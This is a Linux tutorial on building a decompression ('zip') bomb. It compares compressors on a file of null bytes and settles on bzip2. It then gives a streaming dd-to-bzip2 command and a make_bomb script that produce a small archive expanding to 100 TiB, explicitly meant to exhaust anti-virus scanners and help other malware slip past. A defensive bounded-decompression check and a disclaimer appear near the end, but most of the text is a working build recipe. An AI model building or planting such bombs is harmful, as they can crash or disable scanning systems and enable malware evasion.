Creating Zip Bombs In Linux

A zip bomb, also known as a decompression bomb or "zip of death", is a malicious archive file designed to crash, stall or render useless the program or system that unpacks it. It is one of the oldest "malicious files" circulating on the internet. In this module, we'll learn to create a zip bomb in Linux.

What Are Zip Bombs?

Zip bombs are malicious compressed archive files. They are typically aimed at anti-virus engines and other scanners that unpack archives to inspect their contents: a scanner that tries to expand the bomb spends its time, memory or disk budget on it, which an attacker can use to hide other malware behind it or to deny service to the scanning system.

Zip bombs render the program or the system reading them useless.

A zip bomb is a small file that encompasses a HUGE amount of data. The bomb itself is tiny, to avoid suspicion, but when unpacked its contents are more than the target can handle. Depending on where the output goes, the decompressor fills the disk, exhausts memory, or simply runs until it is killed.

Various Compression Programs

The popular compression programs in Linux include:

  • gzip
  • bzip2
  • xz
  • 7z (the 7za command from p7zip)
  • tar (an archiver rather than a compressor; included for comparison)

These programs use different algorithms to compress a file, so we need to find the most efficient one among them for our purpose: highly repetitive input.

Comparing The Different Compression Methods

Before we begin, let's create a 1 GiB file consisting of identical bytes:

$ dd if=/dev/zero of=data.null bs=1M count=1024

This gives us a 1 GiB file of nothing but null bytes:

$ ls -lah data.null
-rw-rw-r-- 1 mint mint 1.0G Apr 18 12:24 data.null

Now we compress the same file with each of the tools above to see which one does best:

$ gzip -c data.null > data.null.gz
$ tar -cf data.null.tar data.null
$ xz -zk data.null
$ 7za a -t7z data.null.7z data.null
$ bzip2 -zk data.null

Listing the directory shows the sizes of the resulting files:

$ ls -lah
total 2.1G
drwxrwxr-x  2 mint mint  4.0K Apr 18 14:18 .
drwxr-xr-x 18 mint mint  4.0K Apr 18 14:18 ..
-rw-rw-r--  1 mint mint  1.0G Apr 18 12:24 data.null
-rw-rw-r--  1 mint mint  149K Apr 18 14:21 data.null.7z
-rw-rw-r--  1 mint mint   785 Apr 18 12:24 data.null.bz2
-rw-rw-r--  1 mint mint 1018K Apr 18 14:11 data.null.gz
-rw-rw-r--  1 mint mint  1.1G Apr 18 14:15 data.null.tar
-rw-rw-r--  1 mint mint  153K Apr 18 12:24 data.null.xz

From this listing we can conclude two things:

  • tar slightly increases the size of the file [ to be accurate, it isn't a compression algorithm at all; the extra bytes are archive headers ]
  • bzip2 is by far the most efficient for this input: it compresses the 1 GiB file down to 785 bytes, a ratio of roughly 1.37 million to one
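
The comparison above as a reusable script (an added example, not code from the original post). It builds a zero-filled test file of a chosen size, runs gzip, bzip2 and xz over it, and prints the compressed size and integer compression ratio for each; 7za is left out because it is rarely installed by default, and tools that are missing are reported rather than failing the run. The size parameter is an assumption of this example so that it can be tried with far less than 1 GiB of disk.

```shell
#!/bin/sh
# compare_compressors: measure how well common Linux compressors handle a
# file of identical bytes, the input a zip bomb is built from.
# Added example; only gzip, bzip2 and xz are exercised.

# Size of a file in bytes; wc -c is portable across GNU and BSD userlands,
# tr strips the padding BSD wc adds.
file_size() {
    wc -c < "$1" | tr -d ' '
}

# Integer compression ratio: uncompressed bytes / compressed bytes.
ratio() {
    echo $(( $1 / $2 ))
}

# compare_compressors MIB
# Writes MIB MiB of zeros to a temporary file, compresses it with each tool
# and prints one line per tool: "<tool> <compressed bytes> <ratio>".
# Tools that are not installed print "<tool> missing -" instead.
compare_compressors() {
    mib="$1"
    tmp=$(mktemp -d)
    dd if=/dev/zero of="$tmp/data.null" bs=1M count="$mib" 2>/dev/null
    orig=$(file_size "$tmp/data.null")
    for tool in gzip bzip2 xz; do
        if ! command -v "$tool" >/dev/null 2>&1; then
            echo "$tool missing -"
            continue
        fi
        # -c writes to stdout for all three tools, so the loop stays uniform.
        "$tool" -c "$tmp/data.null" > "$tmp/out.$tool"
        comp=$(file_size "$tmp/out.$tool")
        echo "$tool $comp $(ratio "$orig" "$comp")"
    done
    rm -rf "$tmp"
}

# Usage: sh compare.sh 64   (compares on 64 MiB of zeros)
if [ -n "${1:-}" ]; then
    compare_compressors "$1"
fi
```

Note that the ratios are not constant across sizes: bzip2 run-length-encodes its input before block compression, so a run of zeros of several tens of megabytes still fits in a single 900 kB block and the ratio keeps climbing until the input spans many blocks, which is why the 1 GiB measurement above is the meaningful one.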

Creating A Zip Bomb

Now that we have a very efficient compressor for this kind of input, we can create our zip bomb. However, writing a file of null bytes to disk and then compressing it isn't the ideal way to make a zip bomb, because it limits the bomb to the free disk space we have: the uncompressed payload has to exist before bzip2 can read it.

A better method is to stream the zeros straight from dd into bzip2, so that only the compressed output ever touches the disk:

$ dd if=/dev/zero bs=1M count=104857600 | bzip2 -c > batman.bz2

This feeds 100 TiB of zeros (104857600 blocks of 1 MiB) through bzip2. Note the small block size: dd allocates a buffer of bs bytes, so a block size like 10G needs 10 GiB of RAM just for the buffer, while a 1 MiB block with a large count produces exactly the same stream. The run takes a long time, since bzip2 still has to read every byte.

Scaling the measurement above (785 bytes per GiB) the result should be on the order of 77 MiB, a ratio of about 1.37 million to one. When someone tries to extract it, it expands to more than 1,000,000 times its size and the decompressor keeps writing null bytes until the disk is full or the process is killed.
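
The streaming build and the check a defender would run against it, as an added example that is not part of the original post. make_bomb pipes a chosen number of MiB of zeros through bzip2 exactly as the command above does, just with the size as a parameter; bounded_size and is_bomb show the counter-measure: decompress into a byte counter capped with head -c, never onto disk, and treat any file that is still producing output at the cap as a bomb. Sizes and the 1 MiB block size are assumptions of this example.

```shell
#!/bin/sh
# Build a bzip2 bomb by streaming, and inspect one safely by decompressing
# to a counter with a hard byte cap. Added example; not the original code.

# make_bomb MIB OUT
# Streams MIB MiB of zeros through bzip2 into OUT; the uncompressed data never
# exists on disk. Prints the size of OUT in bytes.
make_bomb() {
    mib="$1"
    out="$2"
    # bs=1M keeps dd's buffer small; count controls the total volume.
    dd if=/dev/zero bs=1M count="$mib" 2>/dev/null | bzip2 -c > "$out"
    wc -c < "$out" | tr -d ' '
}

# bounded_size FILE LIMIT
# Decompresses FILE into a byte counter, stopping after LIMIT bytes. Output
# goes only to the pipe, so a bomb cannot fill the disk. Prints the number of
# bytes seen; a result equal to LIMIT means the cap was hit.
bounded_size() {
    bzip2 -dc "$1" 2>/dev/null | head -c "$2" | wc -c | tr -d ' '
}

# is_bomb FILE LIMIT
# Succeeds (exit 0) when FILE expands to at least LIMIT bytes, i.e. when the
# cap in bounded_size was reached. Callers pick LIMIT from the compressed
# size, e.g. 1000x, which is already far beyond any normal deflate ratio.
is_bomb() {
    seen=$(bounded_size "$1" "$2")
    [ "$seen" -ge "$2" ]
}

# Usage: sh bomb.sh 1024 batman.bz2   (1 GiB of zeros -> about 785 bytes)
if [ "$#" -ge 2 ]; then
    size=$(make_bomb "$1" "$2")
    echo "$2: $size bytes compressed"
fi
```

The same idea protects an interactive shell: `ulimit -f` caps the size of any file the shell and its children may write, so a decompression that hits the limit fails with a clean error instead of filling the volume.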

Conclusion

In this module we saw how to make a zip bomb; it is presented purely for educational purposes. Zip bombs do little damage by themselves, but by exhausting the time, memory or disk of the scanner that opens them they can pave the way for other malware and help it slip past anti-virus and other defences. This is also why well-built scanners and extraction tools enforce limits on decompression ratio and total output size rather than unpacking blindly.